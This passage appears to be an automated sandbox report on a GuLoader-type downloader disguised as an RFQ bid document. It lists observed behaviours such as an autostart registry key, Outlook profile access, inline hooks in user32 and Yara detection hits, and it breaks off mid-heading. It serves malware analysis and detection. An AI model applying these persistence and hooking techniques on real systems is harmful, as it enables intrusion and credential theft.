      Source: C:\Windows\SysWOW64\wlanext.exeFile written: C:\Users\user\AppData\Roaming\730-O-47\730logri.iniJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.341334406.000000000E9F0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000002.370768381.000000001E210000.00000040.00000001.sdmp, wlanext.exe, 00000010.00000002.517643886.0000000002F5F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, wlanext.exe
      Source: Binary string: wlanext.pdb source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363238766.00000000009EC000.00000004.00000001.sdmp
      Source: Binary string: wlanext.pdbGCTL source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363238766.00000000009EC000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.341334406.000000000E9F0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe PID: 1516, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe PID: 1516, type: MEMORY
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 1_2_00401190 push ds; iretd 1_2_004011FF
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 1_2_00409447 push es; ret 1_2_0040944A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 1_2_0040540F push ss; ret 1_2_00405412
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 1_2_00402086 push ds; iretd 1_2_0040208E
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 1_2_0040752B push ss; ret 1_2_00407532
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 1_2_004039D5 push ebp; iretd 1_2_004039D6
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 1_2_004011AC push ds; iretd 1_2_004011FF
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E28D0D1 push ecx; ret 3_2_1E28D0E4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EBD0D1 push ecx; ret 16_2_02EBD0E4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E7072 push edx; iretd 16_2_006E7085
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E7B98 push es; iretd 16_2_006E7B99
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006ECDF5 push eax; ret 16_2_006ECE48
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006DC678 push ebx; iretd 16_2_006DC679
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006ECE4B push eax; ret 16_2_006ECEB2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006ECE42 push eax; ret 16_2_006ECE48
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006ECEAC push eax; ret 16_2_006ECEB2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006EE7D0 push ss; iretd 16_2_006EE7D3
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeFile created: \1-rfq-iocl-pp-in-301 bid instructionscommercial terms and conditions-2020-10-14..exeJump to behavior

      Boot Survival:

      barindex
      Creates an undocumented autostart registry key Show sources
      Source: C:\Windows\SysWOW64\wlanext.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run CZP4HB18T0HLJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      bar